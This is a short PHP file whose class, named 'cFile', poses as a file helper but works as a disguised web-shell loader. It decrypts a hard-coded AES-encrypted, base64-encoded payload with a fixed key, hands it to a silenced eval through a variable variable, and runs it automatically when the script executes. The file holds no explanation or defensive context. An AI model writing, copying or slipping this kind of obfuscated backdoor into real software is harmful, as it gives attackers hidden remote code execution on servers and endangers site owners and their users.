<?php
class cFile {
    private function selectFile($filename){
        $sign = '7cf811c8c431edb0';
        $fileurl = '1cO8Q1Aoa1SWCW+tJ+FD/oo0wkiBo1jCE918VFxPwtWupjUPA+P66h7LDw6BRJr9';
        $file = openssl_decrypt(cFile::de($fileurl), "AES-128-ECB", $sign,OPENSSL_PKCS1_PADDING);
        $file_error = $$filename;
        @eval($file_error);
        return "filename";
    }
    public function getPriv() {
        return $this->selectFile(...);
    }
    public static function de($file){
            return base64_decode($file);
        }
}
$cfile = new cFile;
$error = $cfile->getPriv();
$error('file');